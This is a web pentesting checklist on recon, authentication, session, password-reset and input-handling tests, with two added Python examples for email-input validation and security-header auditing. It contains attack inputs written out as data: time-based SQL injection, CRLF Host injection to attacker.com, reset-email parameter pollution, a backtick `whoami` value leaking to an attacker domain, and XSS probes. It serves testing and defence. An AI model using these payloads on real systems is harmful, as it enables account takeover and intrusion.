# Pentesting Web checklist

## Recon phase

* Large: a whole company with multiple domains
* Medium: a single domain
* Small: a single website

### Large scope

* [ ] Get [ASN](/pentestbook/recon/public-info-gathering.md#amass) for IP ranges ([amass](https://github.com/OWASP/Amass), [asnlookup](https://github.com/yassineaboukir/Asnlookup), [metabigor](https://github.com/j3ssie/metabigor), [bgp](https://bgp.he.net/))
* [ ] Review latest [acquisitions](https://www.crunchbase.com/)
* [ ] Get relationships by registrants ([viewdns](https://viewdns.info/reversewhois/))
* [ ] Go to medium scope for each domain

### Medium scope

* [ ] [Enumerate subdomains](/pentestbook/recon/subdomain-enum.md) ([amass](https://github.com/OWASP/Amass) or [subfinder](https://github.com/projectdiscovery/subfinder) with all available API keys)
* [ ] Subdomain bruteforce ([puredns](https://github.com/d3mondev/puredns) with [wordlist](https://gist.github.com/six2dez/a307a04a222fab5a57466c51e1569acf))
* [ ] Permute subdomains ([gotator](https://github.com/Josue87/gotator) or [ripgen](https://github.com/resyncgg/ripgen) with [wordlist](https://gist.github.com/six2dez/ffc2b14d283e8f8eff6ac83e20a3c4b4))
* [ ] Identify alive subdomains ([httpx](https://github.com/projectdiscovery/httpx))
* [ ] [Subdomain takeovers](/pentestbook/recon/subdomain-enum/subdomain-takeover.md) ([nuclei-takeovers](https://github.com/projectdiscovery/nuclei-templates/tree/master/takeovers))
* [ ] Check for [cloud assets](/pentestbook/enumeration/cloud/cloud-info-recon.md) ([cloudenum](https://github.com/initstring/cloud_enum))
* [ ] [Shodan](/pentestbook/recon/public-info-gathering.md#shodan) search
* [ ] [Zone transfer](https://six2dez.gitbook.io/pentest-book/enumeration/ports#port-53-dns)
* [ ] Subdomains recursive search
* [ ] Take screenshots ([gowitness](https://github.com/sensepost/gowitness), [webscreenshot](https://github.com/maaaaz/webscreenshot), [aquatone](https://github.com/michenriksen/aquatone))

### Small scope

* [ ] Identify web server, technologies and database ([httpx](https://github.com/projectdiscovery/httpx), [web-check.xyz](https://web-check.xyz/))
* [ ] Try to locate `/robots.txt`, `/crossdomain.xml`, `/clientaccesspolicy.xml`, `/sitemap.xml` and `/.well-known/`
* [ ] Review comments on source code (Burp Engagement Tools)
* [ ] [Directory enumeration](/pentestbook/enumeration/web/crawl-fuzz.md)
* [ ] Web fuzzing ([ffuf](https://github.com/ffuf/ffuf) and [wordlist](https://github.com/six2dez/OneListForAll))
* [ ] Find [leaked ids, emails](/pentestbook/recon/public-info-gathering.md) ([pwndb](https://github.com/davidtavarez/pwndb))
* [ ] Identify WAF ([whatwaf](https://github.com/Ekultek/WhatWaf), [wafw00f](https://github.com/EnableSecurity/wafw00f))
* [ ] [Google dorking](/pentestbook/recon/public-info-gathering.md#google)
* [ ] [GitHub dorking](/pentestbook/recon/public-info-gathering.md#github)/GitHub tools ([githound](https://github.com/tillson/git-hound), [gitdorks\_go](https://github.com/damit5/gitdorks_go))
* [ ] Get urls ([gau](https://github.com/lc/gau), [waybackurls](https://github.com/tomnomnom/waybackurls), [gospider](https://github.com/jaeles-project/gospider))
* [ ] Check potential vulnerable urls ([gf-patterns](https://github.com/1ndianl33t/Gf-Patterns))
* [ ] Automatic XSS finder ([dalfox](https://github.com/hahwul/dalfox))
* [ ] Locate admin and login panel
* [ ] Broken link hijacking ([blc](https://github.com/stevenvachon/broken-link-checker))
* [ ] Get all JS files ([subjs](https://github.com/lc/subjs), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder))
* [ ] JS hardcoded APIs and secrets ([nuclei-tokens](https://github.com/projectdiscovery/nuclei-templates/tree/4e3f843e15c68f816f0ef6abce5d30b6cf6d4a30/exposures/tokens))
* [ ] JS analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder), [getjswords](https://github.com/m4ll0k/BBTz))
* [ ] Run automated scanner ([nuclei](https://github.com/projectdiscovery/nuclei))
* [ ] Test [CORS](/pentestbook/enumeration/web/cors.md) `Access-Control-Allow-Origin`

### Network

* [ ] Check ICMP packets allowed
* [ ] Check DMARC/SPF policies ([spoofcheck](https://github.com/BishopFox/spoofcheck))
* [ ] Open ports with [Shodan](https://www.shodan.io/)
* [ ] [Port scan](/pentestbook/recon/network-scanning.md#nmap) to all ports
* [ ] Check UDP ports ([udp-proto-scanner](https://github.com/CiscoCXSecurity/udp-proto-scanner) or nmap)
* [ ] Test [SSL](/pentestbook/enumeration/ssl-tls.md) ([testssl](https://github.com/drwetter/testssl.sh))
* [ ] If credentials were obtained, try password [spraying](https://github.com/x90skysn3k/brutespray) against all discovered services

### Preparation

* [ ] Study site structure
* [ ] Make a list with all possible test cases
* [ ] Understand the business area and what their customer needs
* [ ] Get a list of every asset `(all_subdomains.txt, live_subdomains.txt, waybackurls.txt, hidden_directories.txt, nmap_results.txt, GitHub_search.txt, altdns_subdomain.txt, vulnerable_links.txt, js_files.txt)`

## User management

### Registration

* [ ] [XSS on name or email](/pentestbook/enumeration/web/email-attacks.md)
* [ ] Duplicate registration (try with uppercase, +1@..., dots in name, etc)
* [ ] Overwrite existing user (existing user takeover)
* [ ] Username uniqueness
* [ ] Weak password policy `(spaces, password, password=123456, 111111, abcabc, qwerty12)`
* [ ] [Insufficient email verification process](/pentestbook/enumeration/web/email-attacks.md) (also `my%00victim@mail.com` for account takeover)
* [ ] If JSON request, add a second value with a comma: `{"email":"victim@mail.com","attacker@mail.com","token":"xxxxxxxxxx"}`
* [ ] Weak registration implementation or allows disposable email addresses
* [ ] Fuzz after user creation to check if any folder has been overwritten or created with your profile name
* [ ] Corrupt authentication and session defects: sign up, don't verify, request a password change, change it, check if the account is active.
* [ ] Try to re-register repeating same request with same password and different password too
* [ ] Lack of confirmation -> try to register with company email.
* [ ] Check OAuth with social media registration
* [ ] Check state parameter on social media registration
* [ ] Try to capture integration url leading integration takeover
* [ ] Check redirections in register page after login
* [ ] Rate limit on account creation
* [ ] Long password (>200) leads to DoS

```
# Duplicate Registration - Check varying the email:
uppercase
victim+1@mail.com
special characters in the email name (%00, %09, %20)
Put blank characters after the email: victim@mail.com a
victim@mail.com@attacker.com
victim@attacker.com@mail.com
```

### Authentication

* [ ] [SQL Injections](/pentestbook/enumeration/web/sqli.md)
* [ ] Username enumeration
* [ ] Resilience to password guessing
* [ ] Account recovery function
* [ ] "Remember me" function
* [ ] Impersonation function
* [ ] Unsafe distribution of credentials
* [ ] Fail-open conditions
* [ ] Multi-stage mechanisms
* [ ] Auto-complete testing
* [ ] Lack of password confirmation on change email, password or 2FA (try change response)
* [ ] Weak login function over HTTP and HTTPS if both are available
* [ ] User account lockout mechanism on brute force attack
* [ ] Check for password wordlist ([cewl](https://github.com/digininja/CeWL) and [burp-goldenNuggets](https://github.com/GainSec/GoldenNuggets-1))
* [ ] Test OAuth login functionality for [Open Redirection](/pentestbook/enumeration/web/ssrf.md)
* [ ] Test response tampering in [SAML](/pentestbook/enumeration/webservices/onelogin-saml-login.md) authentication
* [ ] In OTP check guessable codes and race conditions
* [ ] OTP, check response manipulation for bypass
* [ ] OTP, try bruteforce
* [ ] If JWT is used, check common flaws
* [ ] Browser cache weakness (e.g. Pragma, Expires, Max-age)
* [ ] After register, logout, clean cache, go to home page and paste your profile url in browser, check for `login?next=accounts/profile` for open redirect or XSS with `/login?next=javascript:alert(1);//`
* [ ] Try login with common [credentials](https://github.com/ihebski/DefaultCreds-cheat-sheet)

### Session

* [ ] [Session fixation](/pentestbook/enumeration/web/session-fixation.md)
* [ ] Session handling
* [ ] Test tokens for meaning
* [ ] Test tokens for predictability
* [ ] Insecure transmission of tokens
* [ ] Disclosure of tokens in logs
* [ ] Mapping of tokens to sessions
* [ ] Session termination
* [ ] [Cross-site request forgery](/pentestbook/enumeration/web/csrf.md)
* [ ] Cookie scope
* [ ] Decode Cookie (Base64, hex, URL etc.)
* [ ] Cookie expiration time
* [ ] Check HTTPOnly and Secure flags
* [ ] Use same cookie from a different effective IP address or system
* [ ] Access controls
* [ ] Effectiveness of controls using multiple accounts
* [ ] Insecure access control methods (request parameters, Referer header, etc)
* [ ] Check for concurrent login through different machine/IP
* [ ] Path traversal on cookies
* [ ] Reuse cookie after session closed
* [ ] Logout and click browser "go back" function (Alt + Left arrow)
* [ ] 2 instances open, 1st change or reset password, refresh 2nd instance
* [ ] With privileged user perform privileged actions, try to repeat with unprivileged user cookie.
* [ ] Weak generated security questions

### Profile/Account details

* [ ] Find parameter with user id and try to tamper in order to get the details of other users
* [ ] Create a list of features that are pertaining to a user account only and try [CSRF](/pentestbook/enumeration/web/csrf.md)
* [ ] Change the email address to one that already exists. Check whether it is validated server-side.
* [ ] Check any new email confirmation link and what if user doesn't confirm.
* [ ] File [upload](/pentestbook/enumeration/web/upload-bypasses.md): [eicar](https://secure.eicar.org/eicar.com.txt), No Size Limit, File extension, Filter Bypass, [burp](https://github.com/portswigger/upload-scanner) extension, RCE
* [ ] ImageTragick in profile picture upload
* [ ] CSV import/export: Command Injection, XSS, macro injection
* [ ] Check profile picture URL and find email id/user info or [EXIF Geolocation Data](http://exif.regex.info/exif.cgi)
* [ ] [Metadata](https://github.com/exiftool/exiftool) of all downloadable files (Geolocation, usernames)
* [ ] Account deletion option and try to reactivate with "Forgot password" feature
* [ ] Try brute-force enumeration when changing any unique user parameter.
* [ ] Check whether the application requires re-authentication for sensitive operations
* [ ] Try parameter pollution to add two values of same field
* [ ] Check different roles policy

### Forgot / Reset password

* [ ] Password reset with manipulated email parameter
* [ ] [Host header injection for token leakage](/pentestbook/enumeration/web/header-injections.md#headers)
* [ ] IDOR in reset link - changing Password of any User
* [ ] [HPP](/pentestbook/enumeration/web/parameter-pollution.md) in reset link or in change password/email
* [ ] Password Reset Token Leak Via Referrer
* [ ] Leaked password reset token in response/JS files
* [ ] [SQLi](/pentestbook/enumeration/web/sqli.md): `victim@mail.com'+(select*from(select(sleep(20)))a)+'`
* [ ] [CRLF](/pentestbook/enumeration/web/crlf.md): `/resetpassword?%0d%0aHost:%20attacker.com`
* [ ] Register with `abc@gmail.com.attacker.com` and reset password for `abc@gmáil.com.attacker.com`
* [ ] Change the request method and content-type and observe how the application responds.
* [ ] Append null bytes %00 after your email and observe the response.
* [ ] Try XSS, SSTI etc. in the email field.
* [ ] Invalidate session on Logout and Password reset
* [ ] User Enumeration
* [ ] Uniqueness of forget password reset link/code
* [ ] Reset links expiration time
* [ ] Request 2 reset passwords links and use the older
* [ ] Use `username@burp_collab.net` and analyze the callback
* [ ] Check if many requests have sequential tokens
* [ ] No TLD in email parameter
* [ ] Check encryption in reset password token
* [ ] Understand how token is generated (timestamp, username, birthdate,...)
* [ ] Response manipulation: Replace Bad Response With Good One
* [ ] No Rate Limiting: Email Bombing - capture request and send over 100 times
* [ ] Long password (>200) leads to DoS

```text
email=victim@mail.com&email=attacker@mail.com
email=victim@mail.com%0a%0dcc:attacker@mail.com
email=victim@mail.com%0a%0dbcc:attacker@mail.com
email=victim@mail.com,attacker@mail.com
email=victim@mail.com%20attacker@mail.com
email=victim@mail.com|attacker@mail.com
email=victim@mail.com:attacker@mail.com
email[]=victim@mail.com&email[]=attacker@mail.com
email=victim@mail.com%0ACc:attacker@mail.com%0ABcc:attacker@mail.com
victim&email=attacker@mail.com
{"email":["victim@mail.com","attacker@mail.com"]}
{"email":"victim@mail.com","email":"attacker@mail.com"}

POST https://attacker.com/resetpassword HTTP/1.1
POST @attacker.com/resetpassword HTTP/1.1
POST :@attacker.com/resetpassword HTTP/1.1
POST /resetpassword@attacker.com HTTP/1.1

email=victim@mail.com'+(select*from(select(sleep(20)))a)+'
email=hello@`whoami`.attacker.com
/resetpassword?%0d%0aHost:%20attacker.com
```
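The email variants in the duplicate-registration block and in the reset-password payload block above are exactly what a registration or reset endpoint must refuse. The following server-side normalizer is an added example, not code from the pentestbook: it rejects each of those shapes (duplicate form fields, duplicate JSON keys, CR/LF and NUL bytes, joined pairs, homoglyph domains) and reduces the one accepted address to a single uniqueness key. Its strict grammar and the plus-tag stripping are a constructed policy for illustration.

```python
import json
import re
from urllib.parse import parse_qs

# Deliberately strict grammar (a constructed policy for this example, not the
# full RFC 5322 grammar): ASCII only, exactly one "@", dotted domain with a TLD.
_LOCAL_RE = re.compile(r"^[A-Za-z0-9._+-]+$")
_DOMAIN_RE = re.compile(r"^(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")


def canonical_email(raw):
    """Return one canonical address, or None when the input must be rejected.

    Rejects non-string (JSON array) values, control characters (%00, %09,
    CR/LF header injection), whitespace, comma/pipe/colon-joined pairs, more
    than one "@", a missing TLD, quotes/backticks and non-ASCII look-alike
    domains such as gmáil.com.  The key is lowercased with any "+tag" removed.
    """
    if not isinstance(raw, str) or not 3 <= len(raw) <= 254:
        return None
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in raw):
        return None                        # NUL, TAB, CR, LF
    if not raw.isascii():
        return None                        # gmáil.com and other homoglyphs
    if raw.count("@") != 1:
        return None                        # a@b@c, a@b,c@d, a@b|c@d, ...
    local, domain = raw.split("@")
    if not _LOCAL_RE.match(local) or not _DOMAIN_RE.match(domain):
        return None                        # spaces, quotes, backticks, no TLD
    local = local.split("+", 1)[0]         # drop plus-tag for the uniqueness key
    return (local + "@" + domain).lower()


def _no_duplicate_keys(pairs):
    """json.loads hook: reject objects such as {"email": a, "email": b}."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError("duplicate key: " + key)
        obj[key] = value
    return obj


def email_from_json(body):
    """One canonical address from a JSON body, or None."""
    try:
        obj = json.loads(body, object_pairs_hook=_no_duplicate_keys)
    except ValueError:                     # JSONDecodeError is a ValueError
        return None
    if not isinstance(obj, dict):
        return None
    return canonical_email(obj.get("email"))


def email_from_form(body):
    """One canonical address from a form-encoded body, or None."""
    params = parse_qs(body, keep_blank_values=True)   # percent-decodes values
    values = params.get("email", []) + params.get("email[]", [])
    if len(values) != 1:
        return None                        # email=a&email=b, email[]=a&email[]=b
    return canonical_email(values[0])
```

Whatever address the function returns is the only one the reset mail may be sent to; the rejected shapes never reach the mailer.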

## Input handling

* [ ] Fuzz all request parameters (if got user, add headers to fuzzer)
* [ ] Identify all reflected/Stored data, Path, file name manipulation
* [ ] [Reflected XSS](/pentestbook/enumeration/web/xss.md)
* [ ] Stored [XSS](/pentestbook/enumeration/web/xss.md) / HTML Injection
* [ ] [SQL ](/pentestbook/enumeration/web/sqli.md)injection with `'` and `'--+-`
* [ ] Identify URLs, Paths, File names manipulation
* [ ] Path [traversal](/pentestbook/enumeration/web/lfi-rfi.md), LFI and RFI
* [ ] [Open redirect](/pentestbook/enumeration/web/ssrf.md) / search for `302 or "=http" or "=aHR0"`
* [ ] [SSRF ](/pentestbook/enumeration/web/ssrf.md)in previously discovered open ports
* [ ] HTTP [header injection](/pentestbook/enumeration/web/header-injections.md) in GET & POST (X-Forwarded-Host)
* [ ] RCE via Referer Header
* [ ] [SQL injection](/pentestbook/enumeration/web/sqli.md) via User-Agent Header
* [ ] OS command injection
* [ ] SMTP injection
* [ ] Native software flaws (buffer overflow, integer bugs, format strings)
* [ ] LDAP injection
* [ ] SSI Injection
* [ ] XPath injection
* [ ] [XXE](/pentestbook/enumeration/web/xxe.md) in any request, change content-type to text/xml
* [ ] [NoSQL](/pentestbook/enumeration/webservices/nosql-and-and-mongodb.md) injection
* [ ] HTTP Request [Smuggling](/pentestbook/enumeration/web/request-smuggling.md)
* [ ] HTTP dangerous methods `OPTIONS PUT DELETE`
* [ ] Try to discover hidden parameters ([arjun](https://github.com/s0md3v/Arjun) or [parameth](https://github.com/maK-/parameth))
* [ ] Insecure deserialization

## Error handling

* [ ] Access custom pages like `/whatever_fake.php (.aspx,.html,.etc)`
* [ ] Add multiple parameters in GET and POST request using different values
* [ ] Add `[], ]], [[, ', "` in cookie values and parameter values to create errors
* [ ] Generate error by giving input as `/~randomthing/%s` at the end of URL
* [ ] Use Burp Intruder "Fuzzing Full" List in input to generate error codes
* [ ] Try different HTTP Verbs like `PATCH, DEBUG` or wrong like `FAKE`

## Application Logic

* [ ] Identify the logic attack surface
* [ ] Test transmission of data via the client
* [ ] Test for reliance on client-side input validation
* [ ] Thick-client components (Java, ActiveX, Flash)
* [ ] Multi-stage processes for logic flaws
* [ ] Handling of incomplete input
* [ ] Trust boundaries
* [ ] Transaction logic
* [ ] Implemented CAPTCHA in email forms to avoid flooding
* [ ] Tamper product id, price or quantity value in any action (add, modify, delete, place, pay...)
* [ ] Tamper gift or discount codes
* [ ] Reuse gift codes
* [ ] Try parameter pollution to use gift code two times in same request
* [ ] Try stored XSS in non-limited fields like address
* [ ] Check in payment form if CVV and card number is in clear text or masked
* [ ] Check whether payment is processed by the app itself or sent to a third party
* [ ] IDOR from other users details ticket/cart/shipment
* [ ] Check for test credit card number allowed like `4111 1111 1111 1111` ([sample1](https://www.paypalobjects.com/en_GB/vhelp/paypalmanager_help/credit_card_numbers.htm) [sample2](http://support.worldpay.com/support/kb/bg/testandgolive/tgl5103.html))
* [ ] Check PRINT or PDF creation for IDOR
* [ ] Check unsubscribe button with user enumeration
* [ ] Parameter pollution on social media sharing links
* [ ] Change POST sensitive requests to GET

## Other checks

### Infrastructure

* [ ] Segregation in shared infrastructures
* [ ] Segregation between ASP-hosted applications
* [ ] Web server vulnerabilities
* [ ] Dangerous HTTP methods
* [ ] Proxy functionality
* [ ] [Virtual](/pentestbook/enumeration/webservices/vhosts.md) hosting misconfiguration ([VHostScan](https://github.com/codingo/VHostScan))
* [ ] Check for internal numeric IPs in requests
* [ ] Check for external numeric IPs and resolve them
* [ ] Test [cloud](/pentestbook/enumeration/cloud/cloud-info-recon.md) storage
* [ ] Check the existence of alternative channels ([www.web.com](http://www.web.com) vs m.web.com)

### CAPTCHA

* [ ] Send old captcha value.
* [ ] Send old captcha value with old session ID.
* [ ] Request captcha absolute path like [www.url.com/captcha/1.png](http://www.url.com/captcha/1.png)
* [ ] Remove captcha with any adblocker and request again
* [ ] Bypass with OCR tool ([easy one](https://github.com/pry0cc/prys-hacks/blob/master/image-to-text))
* [ ] Change from POST to GET
* [ ] Remove captcha parameter
* [ ] Convert the JSON request to a regular form-encoded request
* [ ] Try header injections

### Security Headers

* [ ] X-XSS-Protection
* [ ] Strict-Transport-Security
* [ ] Content-Security-Policy
* [ ] Public-Key-Pins (deprecated; modern browsers ignore it)
* [ ] X-Frame-Options
* [ ] X-Content-Type-Options
* [ ] Referrer-Policy
* [ ] Cache-Control
* [ ] Expires
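As an added example that is not part of the pentestbook, the header list above together with the HttpOnly/Secure cookie flags and cache-header items from the Session section, turned into a small audit that runs over a captured response. The required-header set, the one-year HSTS threshold and the sample response are assumptions of this example.

```python
import re

# Constructed sample response headers (not captured from any real site).
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Strict-Transport-Security", "max-age=3600"),
    ("X-Frame-Options", "ALLOW-FROM https://example.com"),
    ("Content-Security-Policy", "default-src 'self'; script-src 'self' 'unsafe-inline'"),
    ("Cache-Control", "public, max-age=86400"),
    ("Set-Cookie", "session=abc123; Path=/; HttpOnly"),
    ("Set-Cookie", "prefs=dark; Path=/; Secure; SameSite=Lax"),
]

# Headers whose absence is reported outright (X-XSS-Protection is left out:
# modern browsers ignore it and a CSP is its replacement).
REQUIRED = ("strict-transport-security", "content-security-policy",
            "x-frame-options", "x-content-type-options", "referrer-policy")


def _values(headers, name):
    """All values of a (case-insensitive) header name, in order."""
    return [v for k, v in headers if k.lower() == name]


def audit_headers(headers):
    """Return finding strings for missing or weak security headers."""
    findings = []
    present = {k.lower() for k, _ in headers}
    findings += ["missing: " + n for n in REQUIRED if n not in present]
    for v in _values(headers, "strict-transport-security"):
        m = re.search(r"max-age=(\d+)", v)
        if not m or int(m.group(1)) < 31536000:
            findings.append("weak: HSTS max-age below one year")
    for v in _values(headers, "content-security-policy"):
        if "'unsafe-inline'" in v or "'unsafe-eval'" in v:
            findings.append("weak: CSP allows 'unsafe-inline' or 'unsafe-eval'")
    for v in _values(headers, "x-frame-options"):
        if v.strip().upper() not in ("DENY", "SAMEORIGIN"):
            findings.append("weak: X-Frame-Options is not DENY or SAMEORIGIN")
    if _values(headers, "public-key-pins"):
        findings.append("info: Public-Key-Pins is deprecated; browsers ignore it")
    cache = " ".join(_values(headers, "cache-control")).lower()
    if _values(headers, "set-cookie") and "no-store" not in cache:
        findings.append("weak: response sets a cookie but Cache-Control lacks no-store")
    return findings


def audit_cookies(headers):
    """Return finding strings for Set-Cookie values lacking Secure/HttpOnly/SameSite."""
    findings = []
    for v in _values(headers, "set-cookie"):
        parts = [p.strip() for p in v.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        for flag in ("secure", "httponly", "samesite"):
            if flag not in attrs:
                findings.append("cookie %s: missing %s" % (name, flag))
    return findings


if __name__ == "__main__":
    for line in audit_headers(SAMPLE_HEADERS) + audit_cookies(SAMPLE_HEADERS):
        print(line)
```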
